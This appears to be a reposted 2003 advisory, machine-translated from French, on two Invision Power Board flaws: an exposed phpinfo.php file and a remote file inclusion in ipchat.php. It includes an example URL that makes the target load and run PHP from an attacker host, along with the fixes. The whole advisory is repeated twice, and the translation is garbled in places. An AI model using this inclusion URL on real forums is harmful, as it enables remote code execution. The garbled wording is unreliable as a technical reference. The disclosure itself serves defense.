Lỗi bảo mật với IBF 1.01 và 1.1.1 :
Ðiều kiện: file phpinfo.php chưa xóa và file ipchat.php được thêm vào !
Invision Power Board
Information: Language: PHP Website: http://www.invisionboard.com
Version: 1.0.1 Problem: phpinfo()
Version: 1.1.1 Problem: Inclusion of file
Development: Invision Power Board is a very complete forum including/understanding a admin part, a management of rights (regulator...), a member part, a list member, a help file, a posting and a management of profiles, Messenger, managements of "friends",...
In version 1.0.1 one finds a relatively traditional fault, it is posting for all of the result of the execution of the order phpinfo();, who contains a fault Cross Scripting Site and énormement reveals information on the computer, the waiter or configuration PHP. This code is in the file phpinfo.php: <?php
phpinfo(); > It will thus be enough to y accèder with a URL of the http://[target]/phpinfo.php type.
In the last version of this forum on this date, the 1.1.1, a new file makes its appearance: the file ipchat.php. In this file one can see like first line of code: require $$root_path."conf_global.php "; This code is a fault only if register_globals=ON. If the configuration is well ' favorable' with the hacker, a file exterior with the waiter can be includes and executé like code php in ipchat.php, by the waiter and with its rights and restrictions. For example the URL: http://[target]/ipchat.php?root_path=http://[attacker ]/will include and executera the file: http://[attacker]/conf_global.php
in: http://[target]/ipchat.php
Solutions: For version 1.0.1, simply to remove the file phpinfo.php.
For version 1.1.1, it will be enough to put like first line in the file ipchat.php the code: $$root_path = "./";
Patchs can be found on http://www.phpsecure.org.
Credit: Author: frog-m@n E-mail: frog-man@frog-man.org Website: http://www.phpsecure.org Date: 27/02/03
Invision Power Board
Information: Language: PHP Website: http://www.invisionboard.com
Version: 1.0.1 Problem: phpinfo()
Version: 1.1.1 Problem: Inclusion of file
Development: Invision Power Board is a very complete forum including/understanding a admin part, a management of rights (regulator...), a member part, a list member, a help file, a posting and a management of profiles, Messenger, managements of "friends",...
In version 1.0.1 one finds a relatively traditional fault, it is posting for all of the result of the execution of the order phpinfo();, who contains a fault Cross Scripting Site and énormement reveals information on the computer, the waiter or configuration PHP. This code is in the file phpinfo.php: <?php
phpinfo(); > It will thus be enough to y accèder with a URL of the http://[target]/phpinfo.php type.
In the last version of this forum on this date, the 1.1.1, a new file makes its appearance: the file ipchat.php. In this file one can see like first line of code: require $$root_path."conf_global.php "; This code is a fault only if register_globals=ON. If the configuration is well ' favorable' with the hacker, a file exterior with the waiter can be includes and executé like code php in ipchat.php, by the waiter and with its rights and restrictions. For example the URL: http://[target]/ipchat.php?root_path=http://[attacker ]/will include and executera the file: http://[attacker]/conf_global.php
in: http://[target]/ipchat.php
Solutions: For version 1.0.1, simply to remove the file phpinfo.php.
For version 1.1.1, it will be enough to put like first line in the file ipchat.php the code: $$root_path = "./";
Patchs can be found on http://www.phpsecure.org.
Credit: Author: frog-m@n E-mail: frog-man@frog-man.org Website: http://www.phpsecure.org Date: 27/02/03
Không có nhận xét nào:
Đăng nhận xét